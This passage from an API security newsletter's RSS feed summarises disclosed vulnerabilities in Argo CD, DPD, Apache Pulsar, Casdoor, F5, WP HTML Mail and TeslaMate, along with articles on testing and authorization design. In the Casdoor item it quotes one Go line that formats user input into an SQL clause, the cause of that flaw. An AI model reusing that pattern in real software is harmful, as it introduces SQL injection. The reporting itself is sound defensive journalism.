<p>The post <a href="https://apisecurity.io/issue-173-coinbase-vulnerability-authn-authz-best-practices-bad-bots-hack-elgato-key-light/">Issue 173: Coinbase vulnerability, AuthN/AuthZ best practices, bad bots, Elgato Key light hack</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 172: Argo CD vulnerability, state of API security survey, API testing with Zap and Postman</title>
		<link>https://apisecurity.io/issue-172-argo-cd-vulnerability-state-of-api-security-survey-api-testing-with-zap-and-postman/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 16 Feb 2022 19:09:58 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9151</guid>

					<description><![CDATA[<p>This week, we have news of a vulnerability in Argo CD that allowed leaking application secrets, a survey of the state of API security across three regions, a quick read on how to use Postman and OWASP Zap for API security testing, and finally views on how to distribute authorization services in a microservice architecture. [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-172-argo-cd-vulnerability-state-of-api-security-survey-api-testing-with-zap-and-postman/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-172-argo-cd-vulnerability-state-of-api-security-survey-api-testing-with-zap-and-postman/">Issue 172: Argo CD vulnerability, state of API security survey, API testing with Zap and Postman</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of a vulnerability in Argo CD that allowed leaking application secrets, a survey of the state of API security across three regions, a quick read on how to use Postman and OWASP Zap for API security testing, and finally views on how to distribute authorization services in a microservice architecture.</p>
<h2>Vulnerability: Argo CD path-traversal vulnerability enables leaking data</h2>
<p>This week&#8217;s major news has been the <a href="https://threatpost.com/argo-cd-security-bug-kubernetes-cloud-apps/178239/" target="_blank" rel="noopener noreferrer">vulnerability discovered in Argo CD</a>, a popular continuous delivery platform.</p>
<p>The vulnerability (CVE-2022-24348, CVSS score of 7.7) was discovered by researchers at Apiiro, and allowed attackers to exploit a path traversal vulnerability in the platform to gain access to other application instances. Researchers believe this could have led to leaking passwords, API keys, and tokens. According to the researchers, attackers could exploit it by loading a malicious Helm Chart YAML file into affected Argo CD systems.</p>
<p>The root cause of the vulnerability was an implementation error in the method <code>ParseRequestURI</code> which validated the root directories of paths loaded from external sources. If the input path received appeared to be a URL, further checks were skipped. This meant that attackers could use a URL path to bypass the anti-path-traversal checks. By specifying the arbitrary path in a Helm Chart allowed attackers to access any file or directory on the server filesystem.</p>
<p>The researchers advise Argo CD users to patch their systems as soon as possible.</p>
<h2>Survey: The state of API security</h2>
<p>Dutch cybersecurity company Cybersprint has released <a href="https://www.cybersprint.com/blog/the-state-of-api-security-global-research-comparison" target="_blank" rel="noopener noreferrer">a report into the state of API security</a> across the EU, North American, and APAC regions. The report examines differences in API security between the regions to understand if API security is a global issue or not.</p>
<p>The research methodology involved the analyzing exposed API definitions (seemingly limited to OpenAPI Specification v2 (aka Swagger) only) to identify common misconfigurations and confidential data exposed.  Over 40,000 API definitions were analyzed across the three regions .</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9158" src="https://apisecurity.io/wp-content/uploads/2022/02/Article2.jpg" alt="" width="603" height="279" /></p>
<p>The results of the assessment are perhaps not a major surprise to readers of this newsletter — typical issues identified included:</p>
<ul>
<li><strong>No authentication</strong>: Insufficient or no authentication in many APIs, allowing fully unauthenticated access to them.</li>
<li><strong>Hard-coded API keys</strong>: Hard-coded API keys used in many API definitions, effectively allowing open access.</li>
<li><strong>Data leaks</strong>: Excessive data exposure in many APIs, leading to exposing customer data.</li>
<li><strong>Critical PII issues</strong>: In addition to other data leaks, several APIs were also leaking sensitive PII data (such as healthcare records).</li>
</ul>
<p>Along with using a holistic approach to API security by following best practices, the report also highlights the importance of monitoring and reducing the attack surfaces in organizations.</p>
<h2>Article: API security testing with OWASP Zap and Postman</h2>
<p>The Test Therapist has put together <a href="https://thetesttherapist.com/2022/02/13/api-security-testing-with-postman-and-owasp-zap/" target="_blank" rel="noopener noreferrer">a great guide on using Postman and OWASP Zap for security testing of APIs</a>.</p>
<p>As the author rightly indicates, security testing of APIs is often neglected or left too late in their life cycle. Using two popular open-source tools this guide describes the steps for this approach to security testing (here in a nutshell):</p>
<ol>
<li>Set up OWASP Zap to act as a local proxy (using a known port).</li>
<li>Set up Postman to use the Zap proxy for all connections.</li>
<li>Using Postman, navigate to all known API endpoints and use their functions.</li>
<li>In Zap, verify that all API endpoints are shown on the site list.</li>
<li>In Zap, use the Attack feature to run a suite of common security tests against the API.</li>
</ol>
<p>A great write-up of a very simple technique that may be of use when a full API specification is not available.</p>
<h2>Article: Patterns of authorization for microservices</h2>
<p>Finally this week, we have <a href="https://www.osohq.com/post/microservices-authorization-patterns" target="_blank" rel="noopener noreferrer">a technical article on patterns of authorization for microservices</a> by OSOHq.</p>
<p>The article addresses emerging patterns for authorization policy and practices in distributed applications. Previously, architects have been able to deploy a single database to determine authorization policy. However, things no longer are so simple in a modern world of microservices and distributed architectures.</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9163" src="https://apisecurity.io/wp-content/uploads/2022/02/Article4.jpg" alt="" width="600" height="400" /></p>
<p>The author describes three fundamental approaches to solving the problem within a distributed environment:</p>
<ul>
<li><strong>Keep the data where it is</strong>: This is the simplest approach and works well for small designs but lacks the ability to scale. Essentially, the authorization data is decomposed and stored in proximity to its associated services which access it directly.</li>
<li><strong>Use a request gateway</strong>: This approach uses a request gateway to attach all users&#8217; authorization data to each request made in the system. Although a robust solution, this can lead to an explosion of data in systems with large numbers of roles.</li>
<li><strong>Centralize the authorization data</strong>: Using the principle of separation of concerns, this approach involves creating a central authorization service that acts as the single source of truth. This approach poses challenges for high availability and low latency.</li>
</ul>
<p>The parting advice is to try and keep things simple and <cite>&#8220;build authorization around the application, not the other way around&#8221;.</cite></p>
<p>The post <a href="https://apisecurity.io/issue-172-argo-cd-vulnerability-state-of-api-security-survey-api-testing-with-zap-and-postman/">Issue 172: Argo CD vulnerability, state of API security survey, API testing with Zap and Postman</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Addressing the OWASP API Authentication and Authorization Challenges. </title>
		<link>https://apisecurity.io/owasp-api-security-top-10-challenges-webinar-series-part-2/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 10 Feb 2022 13:36:10 +0000</pubDate>
				<category><![CDATA[Industry News]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9132</guid>

					<description><![CDATA[<p>In this 3-part webinar series Dr. Philippe De Ryck, Web Security Expert with Pragmatic Web Security and Colin Domoney of 42Crunch and APISecurity.io, take a deep dive into understanding and addressing the OWASP API Security Top 10 issues. Through detailed practical examples and use cases, they guide developers and security professionals through how to fix [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/owasp-api-security-top-10-challenges-webinar-series-part-2/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/owasp-api-security-top-10-challenges-webinar-series-part-2/">Addressing the OWASP API Authentication and Authorization Challenges. </a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><img loading="lazy" decoding="async" class="alignnone wp-image-9133 size-full" src="https://apisecurity.io/wp-content/uploads/2022/02/42C_S2_PWS_Webinars_600x300_S2.png" alt="" width="1251" height="626" /></p>
<p>In this 3-part webinar series Dr. Philippe De Ryck, Web Security Expert with Pragmatic Web Security and Colin Domoney of 42Crunch and APISecurity.io, take a deep dive into understanding and addressing the OWASP API Security Top 10 issues. Through detailed practical examples and use cases, they guide developers and security professionals through how to fix and secure their APIs in the face of these identified threats.</p>
<div><strong>Episode 2 : Addressing the OWASP API Authentication and Authorization Challenges. </strong></div>
<div>In this episode Dr. Philippe De Ryck, Web Security Expert with Pragmatic Web Security and Colin Domoney of 42Crunch and APISecurity.io. address one-by-one, the OWASP API Authentication and Authorization Challenges. Through detailed practical examples and use cases, they guide developers and security professionals through how to fix and secure their APIs in the face of these identified threats.</div>
<div><a href="https://42crunch.com/owasp-api-security-top-10-webinar-series/">Register</a></div>
<p>&nbsp;</p>
<div></div>
<div>The first episode in the series, took place on January 25th and was very well received. It looked at the API landscape today and explained why APIs merit a separate OWASP Top 10 listing. Philippe highlighted some examples of data breaches and explained why the breaches occurred. He also presented a case study highlighting how companies, security teams and development teams can achieve a fast and secure API development process. Don&#8217;t worry if you missed it, the recording and slide deck are available once you register for the webinar series.</div>
<p class="mt-4 mb-4 grey-out">Why attend?:</p>
<ul class="mt-4 mb-4 grey-out">
<li>APIs are the number one attack surface for hackers, learn how to protect your business today.</li>
<li>Industry leading API Security experts coach you how to improve the security posture of your APIs.</li>
<li>How to find and fix the OWASP API Security top vulnerabilities &#8211; from 1 to 10.</li>
<li>Guidance on how implementing security at design and run-time protects APIs throughout the lifecycle.</li>
</ul>
<p><strong>Webinar 2: Addressing the OWASP API Authentication and Authorization Challenges. </strong></p>
<p>11am EST / 4pm GMT &#8211; Feb 17th, 2022</p>
<p><a href="https://42crunch.com/owasp-api-security-top-10-webinar-series/">Register</a></p>
<p>The post <a href="https://apisecurity.io/owasp-api-security-top-10-challenges-webinar-series-part-2/">Addressing the OWASP API Authentication and Authorization Challenges. </a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 171: DPD parcel tracking flaw, Apache Pulsar and Casdoor vulnerabilities, trends in API industry</title>
		<link>https://apisecurity.io/issue-171-dpd-parcel-tracking-flaw-apache-pulsar-casdoor-vulnerabilities-trends-api-industry/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 09 Feb 2022 18:29:32 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9110</guid>

					<description><![CDATA[<p>This week, we have news of multiple API flaws and vulnerabilities: the parcel tracking portal at DPD that may have exposed customer data;  an API vulnerability in the Apache Pulsar that allowed access data in different tenants; and an SQL injection vulnerability in Casdoor API. On the more positive side, we take a look at [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-171-dpd-parcel-tracking-flaw-apache-pulsar-casdoor-vulnerabilities-trends-api-industry/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-171-dpd-parcel-tracking-flaw-apache-pulsar-casdoor-vulnerabilities-trends-api-industry/">Issue 171: DPD parcel tracking flaw, Apache Pulsar and Casdoor vulnerabilities, trends in API industry</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have news of multiple API flaws and vulnerabilities: the parcel tracking portal at DPD that may have exposed customer data;  an API vulnerability in the Apache Pulsar that allowed access data in different tenants; and an SQL injection vulnerability in Casdoor API. On the more positive side, we take a look at the emerging trends in the API industry.</p>
<h2>Vulnerability: DPD parcel tracking flaw may have exposed customer data</h2>
<p>The big news this week was the disclosure of <a href="https://www.bleepingcomputer.com/news/security/dpd-group-parcel-tracking-flaw-may-have-exposed-customer-data/" target="_blank" rel="noopener noreferrer">a vulnerability in the parcel tracking portal of  DPG Group</a>, which may have exposed customer data.</p>
<p>The vulnerability was discovered by Pen Test Partners in September 2021, and they co-operated with DPD Group to assess and triage the vulnerability. DPD Group resolved the vulnerability in October 2021 and had requested that the details only be published in the new year to have time to conduct a full review.</p>
<p>The package tracking provides an API call that accepts a UK postcode together with a parcel tracking code to return a PNG image of the recipient&#8217;s address through an OpenStreetMap. The first stage of the exploit was that attackers could post a random parcel code to retrieve an image like the following:</p>
<p><img loading="lazy" decoding="async" class="alignnone wp-image-9117" src="https://apisecurity.io/wp-content/uploads/2022/02/Article1.jpg" alt="" width="599" height="602" /></p>
<p>Using elementary analysis of the received map image, the researchers determined the exact postcode of the recipient. This postcode could then be supplied together with the parcel code to retrieve detailed delivery information, including PII information.</p>
<p>A successful attack would have been reliant on guessing an active, valid parcel code and would also have required manual steps to extrapolate the exact postcode and defeat the Captcha. However, given the valuable PII disclosed, DPD Group considered this attack to be serious, and they responded quickly to remediate it.</p>
<p>Lessons learned here include:</p>
<ul>
<li>Be wary of <a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure">API3:2019 — Excessive data disclosure</a> — for tracking purposes, there was no need to return the full PII record of the customer.</li>
<li>A lack of rate limiting (<a href="https://apisecurity.io/encyclopedia/content/owasp/api4-lack-of-resources-and-rate-limiting" target="_blank" rel="noopener noreferrer">API 4:2019 — Lack of resources and rate limiting</a>) allowed automated attacks with random parcel numbers. Make sure to include protection against bot or scripted attacks.</li>
</ul>
<h2>Vulnerability: Apache Pulsar admin API vulnerability</h2>
<p>The second vulnerability covered in this week&#8217;s edition comes courtesy of <a href="https://www.cve.org/CVERecord?id=CVE-2021-41571" target="_blank" rel="noopener noreferrer">a flaw in the admin API of the popular Apache Pulsar platform</a>.</p>
<p>The admin API required a client to submit a topic and a ledger ID associated with the provided topic. The API implementation did check the client authorization, but unfortunately it did not check the authorization for the ledger ID. This could have allowed an attacker to provide a ledger ID for data on other tenants, for which they were not authorized.</p>
<p>This issue affects Apache Pulsar version 2.8.0 and prior versions. If you are using an affected version, do upgrade to a version with the fix as soon as possible</p>
<p>This vulnerability is an example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization" target="_blank" rel="noopener noreferrer">API1:2019 — Broken object level authorization</a>, perhaps also <a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization" target="_blank" rel="noopener noreferrer">API5:2019 — Broken function level authorization</a>.</p>
<h2>Vulnerability: SQL injection vulnerability in Casdoor API</h2>
<p>The third vulnerability this week is the <a href="https://github.com/casdoor/casdoor/issues/439" target="_blank" rel="noopener noreferrer">vulnerability in the Casdoor single-sign-on platform</a>. The vulnerability, tracked as CVE-2022-24124, was discovered by the security researcher <a href="https://twitter.com/wuhan005" target="_blank" rel="noopener noreferrer">@wuhan005</a>, and it is detailed in a GitHub issue on the associated GitHub repository.</p>
<p>The researcher discovered that the endpoint <code>/api/get-organizations</code> was vulnerable to SQL injection by examining the underlying code:<br />
<code class="language-go">session = session.And(fmt.Sprintf("%s like ?", util.SnakeString(field)), fmt.Sprintf("%%%s%%", value))</code></p>
<p>This is an example of an <a href="https://apisecurity.io/encyclopedia/content/owasp/api8-injection" target="_blank" rel="noopener noreferrer">API8:2019 — Injection</a> vulnerability — in this case, an SQL injection attack that celebrates its 20th anniversary this year!</p>
<h2>Opinion: Emerging trends in the API industry</h2>
<p>Finally this week, we have <a href="https://devops.com/trends-in-the-api-industry/" target="_blank" rel="noopener noreferrer">an excellent discussion between Bill Doerrfeld and Steve Rodda, CEO at Stoplight</a>. Although they do cover a wide range of API topics, they emphasize the need for robust API security.</p>
<p>Doerrfeld and Rodda identify common security issues — familiar to readers of this newsletter — including:</p>
<ul>
<li>Failures relating to authorization</li>
<li>Excessive data exposure</li>
<li>Exposure of endpoints intended to be for private or internal use only</li>
<li>Security misconfiguration</li>
</ul>
<p>Rodda recommends: “<em>good documentation, good design guides and good discipline around building something with a cross-functional nature will increase security and scalability</em>”.</p>
<p>The post <a href="https://apisecurity.io/issue-171-dpd-parcel-tracking-flaw-apache-pulsar-casdoor-vulnerabilities-trends-api-industry/">Issue 171: DPD parcel tracking flaw, Apache Pulsar and Casdoor vulnerabilities, trends in API industry</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 170: DevSecOps approach to API security, F5 vulnerabilities, ten API integration trends</title>
		<link>https://apisecurity.io/issue-170-devsecops-approach-to-api-security-f5-vulnerabilities-ten-api-integration-trends/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 02 Feb 2022 21:02:50 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9087</guid>

					<description><![CDATA[<p>This week, we have an article on applying a DevSecOps approach to API security, by utilizing a shift-left and protect and monitor right approach; a pair of vulnerabilities patched by F5; views on the top 10 API integration trends by Brenton House: and finally, a view on the rise of bot attacks against APIs. Article: [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-170-devsecops-approach-to-api-security-f5-vulnerabilities-ten-api-integration-trends/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-170-devsecops-approach-to-api-security-f5-vulnerabilities-ten-api-integration-trends/">Issue 170: DevSecOps approach to API security, F5 vulnerabilities, ten API integration trends</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have an article on applying a DevSecOps approach to API security, by utilizing a shift-left and protect and monitor right approach; a pair of vulnerabilities patched by F5; views on the top 10 API integration trends by Brenton House: and finally, a view on the rise of bot attacks against APIs.</p>
<h2>Article: Taking a DevSecOps approach to API security</h2>
<p>This week, Doug Dooley has published an article on <a href="https://devops.com/why-traditional-approaches-to-api-security-dont-work/" target="_blank" rel="noopener noreferrer">how a DevSecOps approach could be applied to API security</a>.  It describes how an approach of shift-left and protect and monitor right could result in more secure APIs by bringing API development more in line with well-established processes for application development.</p>
<p>Dooley describes how a traditional approach to API security is overly reliant on protection afforded by API gateways and content delivery networks (CDNs). Whilst these methods offer some level of protection, they are insufficient against some of the more sophisticated attack methods, such as broken object level authorization (BOLA/IDOR) or authentication and authorization attacks.</p>
<p>Dooley describes how customer-facing APIs (the &#8220;north—south&#8221; APIs) need to be thoroughly and continuously secured. The internal APIs (the &#8220;east—west&#8221; APIs) are also vulnerable to attack if deployed in a cloud environment. Basically, assume <em>all</em> APIs are equally valuable and attractive to attackers.</p>
<p>By using a DevSecOps approach, API developers can leverage a number of advantages:</p>
<ul>
<li>Security experts can make ongoing risk-based decisions on issues as they arise, rather than catching issues post-deployment.</li>
<li>CI/CD systems enable automated testing of APIs throughout their construction and deployment.</li>
<li>APIs can be deployed with active protection and continuous reporting, to ensure that emerging API threats are detected in real-time.</li>
<li>When an incident occurs, all teams involved can have an informed view of the affected components and their risks, and make appropriate decisions to remediate and redeploy.</li>
</ul>
<h2>Vulnerability: F5 fixes high-risk vulnerabilities</h2>
<p>The Daily Swig featured details of <a href="https://portswigger.net/daily-swig/f5-fixes-high-risk-nginx-controller-vulnerability-in-january-patch-rollout" target="_blank" rel="noopener noreferrer">a pair of high-risk vulnerabilities affecting network technology provider F5</a>. Details of them were provided in F5&#8217;s quarterly patch notice, which addressed a total of 15 high severity vulnerabilities.</p>
<p>The first issue affected the NGINX Controller API Management product, which allows DevOps teams to control the API lifecycle, security included. Somewhat ironically, the product itself had an API vulnerability that allowed an injection attack using an <code>admin</code> role against an undisclosed API. An attacker could have used this endpoint to inject malicious JavaScript which could then execute within the target data planes — a great example of <a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization" target="_blank" rel="noopener noreferrer">API5:2019 — Broken function level authorization</a>. The vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2022-23008" target="_blank" rel="noopener noreferrer">CVE-2022-23008</a>) was given a CVSS score of 8.7, and has now been patched in version 3.19.1.</p>
<p>The second vulnerability affects the BIG-IP load balancer. This configuration utility was vulnerable to cross-site scripting (XSS) attacks that allowed injecting JavaScript into the context of the current logged-in user. The vulnerability (<a href="https://nvd.nist.gov/vuln/detail/CVE-2022-23013" target="_blank" rel="noopener noreferrer">CVE-2022-23013</a>) was given a CVSS score of 7.5 and has also now been patched.</p>
<h2>Opinion: Ten API integration trends</h2>
<p>We also have our regular contributor to the newsletter, Brenton House, who discusses <a href="https://blog.softwareag.com/api-integration" target="_blank" rel="noopener noreferrer">ten hot API integration trends for 2022</a>. In his view they are, :</p>
<ol>
<li>API cybersecurity</li>
<li>Seamless integration solutions</li>
<li>Adaptive API management</li>
<li>API and integration automation</li>
<li>Industry-specific breakouts</li>
<li>API best practices</li>
<li>OpenAPI standards</li>
<li>API and integration experience</li>
<li>API-led modernization</li>
<li>API economy growth</li>
</ol>
<p>Readers of this newsletter are unlikely to be surprised to see API security featuring at the top of the list. House highlights that APIs are likely to become the most frequently used attack vector, which — coupled with the exponential growth of APIs — leads to API security becoming a <em>very</em> hot topic.</p>
<p>House emphasizes the value of the &#8220;shift-left, shield-right&#8221; approach (covered in the first article in this newsletter), and highlights the importance of the related topics of encryption and privacy when considering the overall API security strategy.</p>
<h2>Article: Bot attacks on APIs increasing</h2>
<p>Next up, we have <a href="https://bmmagazine.co.uk/business/bot-attacks-on-apis-pilling-up-how-companies-can-prepare/" target="_blank" rel="noopener noreferrer">an article on the rise of bot attacks against APIs</a>. It highlights the challenges that bots present to APIs, primarily that they are hard to detect and therefore hard to defend against. Bot sophistication has increased rapidly and can now mimic the behavior of a human user quite accurately.</p>
<p>Typically, adversaries use a a combination of the following tactics:</p>
<ul>
<li>Automate bot attacks.</li>
<li>Access a wide pool of account information and credentials to attempt account takeovers (ATO).</li>
<li>Use clusters of mobile devices all grouped together to avoid device detection.</li>
</ul>
<p>Defenders have two options in reducing the effectiveness of bot attacks: firstly, they can reduce the efficiency of bot attacks, for example, with rate-limiting, and secondly, they can increase attacker costs by using better protection methods on their APIs.</p>
<h2>Webinar: OWASP API Security Top 10 Challenges</h2>
<p>Last week, I was joined by Dr. Philippe De Ryck, Web Security Expert with Pragmatic Web Security, as we discussed OWASP API Security Top 10 issues in the <a href="https://42crunch.com/owasp-api-security-top-10-webinar-series/" target="_blank" rel="noopener noreferrer">first of a three-part webinar series</a>.</p>
<p>On Thursday, 17 February at 11 AM (EST) / 4 PM (GMT), Philippe returns to discuss the key topics in authentication and authorization. This promises to be a very useful session for anyone tasked with API development, as Philippe once again brings his considerable expertise and experience to the audience.</p>
<p><a href="https://42crunch.com/owasp-api-security-top-10-webinar-series/"><img loading="lazy" decoding="async" class="alignnone wp-image-9040" src="https://apisecurity.io/wp-content/uploads/2022/01/Article5.jpg" alt="" width="602" height="233" /></a></p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-170-devsecops-approach-to-api-security-f5-vulnerabilities-ten-api-integration-trends/">Issue 170: DevSecOps approach to API security, F5 vulnerabilities, ten API integration trends</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 169: Insecure API in WordPress plugin, Tesla 3rd party vulnerability, introducing vAPI</title>
		<link>https://apisecurity.io/issue-169-insecure-api-wordpress-plugin-tesla-3rd-party-vulnerability-introducing-vapi/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 26 Jan 2022 18:44:22 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=9047</guid>

					<description><![CDATA[<p>This week, we have details of a vulnerability in the popular WordPress plugin, WP HTML Mail, which potentially exposed 20,000 WordPress sites, and a vulnerability in TeslaMate software exposing dozens of Teslas to remote access. On more positive news, we have an introduction to vAPI, an open-source laboratory for learning API security, and an article [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-169-insecure-api-wordpress-plugin-tesla-3rd-party-vulnerability-introducing-vapi/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-169-insecure-api-wordpress-plugin-tesla-3rd-party-vulnerability-introducing-vapi/">Issue 169: Insecure API in WordPress plugin, Tesla 3rd party vulnerability, introducing vAPI</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we have details of a vulnerability in the popular WordPress plugin, WP HTML Mail, which potentially exposed 20,000 WordPress sites, and a vulnerability in TeslaMate software exposing dozens of Teslas to remote access. On more positive news, we have an introduction to vAPI, an open-source laboratory for learning API security, and an article on how to reduce API attack surfaces.</p>
<h2>Vulnerability: WordPress sites exposed by insecure REST API</h2>
<p>This week, we have <a href="https://threatpost.com/wordpress-insecure-plugin-rest-api/177866/" target="_blank" rel="noopener noreferrer">another vulnerability in a WordPress plugin</a>, this time the popular WP HTML Mail plugin. The vulnerability is tracked as CVE-2022-0218 with a CVSS score of 8.3, and it was discovered by Wordfence researcher Chloe Chamberland. The vulnerability may have impacted up to 20,000 WordPress installations, rendering them vulnerable as a result of the cross-site scripting (XSS) bug courtesy of an unprotected REST API endpoint in the plugin.</p>
<p>This REST API endpoint allowed clients to save email theme settings that were used for rendering WordPress content. According to Chamberland, there was no authentication at all, which allowed attackers to upload any content — such as malicious JavaScript — to the template that was then stored in the WordPress database. XSS attacks execute within the context of the current browser session, meaning that users with elevated privileges could have enabled attacks like phishing campaigns or even entire site takeovers.</p>
<p>Chamberland recommends that users verify they are using version 3.1 — the patched version of the plugin — or higher.</p>
<h2>Vulnerability: Tesla vehicles exposed by a vulnerability in 3rd party software</h2>
<p>Another vulnerability disclosed this week comes from security researcher David Colombo. The <a href="https://techcrunch.com/2022/01/24/teslamate-bug-teslas-exposed-remote/" target="_blank" rel="noopener noreferrer">vulnerability was found in a 3rd party application, TeslaMate</a>, which is widely used by owners of Tesla vehicles, and it does not affect Tesla&#8217;s infrastructure directly. News of the vulnerability first broke <a href="https://twitter.com/david_colombo_/status/1480632304045330433?s=20" target="_blank" rel="noopener noreferrer">in a Tweet</a> by Colombo in early January, when he claimed to have <cite>&#8220;full remote control of over 20 Tesla’s in 10 countries&#8221;.</cite> Fortunately, it turned out that this did not include the ability to remotely control the movement of the vehicle.</p>
<p>TeslaMate is a free logging and dashboard utility used by Tesla owners to access their vehicles&#8217; hidden data. Typically, TeslaMate is self-hosted by users and requires a vehicle API key to access the data of the vehicle. Unfortunately, the web dashboard contained several security flaws that allowed anonymous access and using default passwords. These issues — coupled with the fact that many users exposed the dashboards to the internet for convenience — meant that an attacker could gain access to the vehicle API key.</p>
<p>Colombo claimed that he could access dozens of vehicles through these exposed dashboards, but the total number exposed in this manner is likely higher. The maintainer of the TeslaMate <a href="https://techcrunch.com/2022/01/24/teslamate-bug-teslas-exposed-remote/#:~:text=pushed%20a%20software%20fix" target="_blank" rel="noopener noreferrer">provided a software update</a> within hours of being notified, and Colombo believes that Tesla has revoked thousands of driver&#8217;s API keys.</p>
<p>Lessons learned here include:</p>
<ul>
<li>API keys are the keys to the kingdom — always be wary of directly or (as in this case) inadvertently disclosing these keys.</li>
<li>As an API provider, always ensure that you have a tested, reliable key revocation and rotation procedure in place.</li>
<li>As an API consumer, be wary of default configurations and passwords. It pays to make a habit of always checking and changing these.</li>
</ul>
<h2>Tools: Introducing vAPI, an open-source laboratory for API security</h2>
<p>An extremely popular item this week has been the coverage <a href="https://portswigger.net/daily-swig/introducing-vapi-an-open-source-lab-environment-to-learn-about-api-security" target="_blank" rel="noopener noreferrer">vAPI, an open-source tool designed to mimic OWASP API security Top 10 vulnerabilities</a>. The tool is primarily intended as a vulnerability exercise and a test platform to provide an immersive environment where to learn more about API security.</p>
<p>The tool is <a href="https://github.com/roottusk/vapi" target="_blank" rel="noopener noreferrer">available on GitHub</a> and was developed by the security researcher Tushar Kulkarni.  It is based on the Laravel PHP framework using MySQL as the database layer. A Docker image is provided for ease of use. Kulkarni recommends using a &#8216;manipulator-in-the-middle&#8217; (MitM) proxy, such as Burp Suite or OWASP Zap, to explore all available vulnerabilities.</p>
<p>We&#8217;re excited to feature this tool and look forward to featuring updates in the future: the tool&#8217;s roadmap includes, for example, a dashboard on progress through the challenges the tool provides. Certainly, the <a href="https://owasp.org/www-project-juice-shop/" target="_blank" rel="noopener noreferrer">OWASP Juice Shop</a> has been invaluable in enabling the community to learn about web application security, and we wish Kulkarni well in establishing vAPI as the equivalent for API security.</p>
<h2>Article: Reducing API attack surfaces</h2>
<p>The final article this week comes from <a href="https://securityboulevard.com/2022/01/more-simple-less-api-attack-vectors/" target="_blank" rel="noopener noreferrer">Security Boulevard discussing practical approaches to reducing API attack surfaces</a> and the risk of exposure. Beyond the obvious security benefits, this also brings greater quality and reliability, and reduced maintenance effort.</p>
<p>The author suggests the following techniques for reducing API complexity:</p>
<ul>
<li><strong>Use existing standards and conventions whenever possible</strong>: Don&#8217;t reinvent the wheel and go adding complexity and maintenance issues.</li>
<li><strong>Use a stateless authorization model</strong>: Use standard authorization patterns to reduce the complexity instead of rolling your own.</li>
<li><strong>Deprecate old</strong> <strong>endpoints</strong>: Identify and actively deprecate and remove old or unused endpoints.</li>
<li><strong>Push functionality to clients when</strong> <strong>possible</strong>: Leverage clients for intensive processing, but be careful you don&#8217;t introduce unintended client-side security issues.</li>
<li><strong>Be conservative about returned data</strong>: Reduce the amount of data returned to the client.</li>
<li><strong>Reduce variant resource</strong> <strong>representations</strong>: Avoid creating multiple endpoints for similar functions — consolidation is the key.</li>
<li><strong>Separate the endpoints with read or write</strong> <strong>permissions</strong>: Restrict user roles based on allowed actions, and use the correct HTTP verbs (methods).</li>
<li><strong>Align resource boundaries to permission</strong> <strong>boundaries</strong>: Use fine-grained resources to minimize the likelihood of excessive exposure or mass assignments.</li>
<li><strong>Implement generic audit</strong> <strong>logs</strong>: Use standard patterns when implementing logging.</li>
<li><strong>Use a web application and API protection</strong> <strong>solution</strong>: Protect API endpoints with runtime &#8216;shield right&#8217; protections.</li>
</ul>
<p>Although many of these techniques are self-evident, they may prove hard to implement in reality. Nevertheless, the article is a worthwhile read for all API architects.</p>
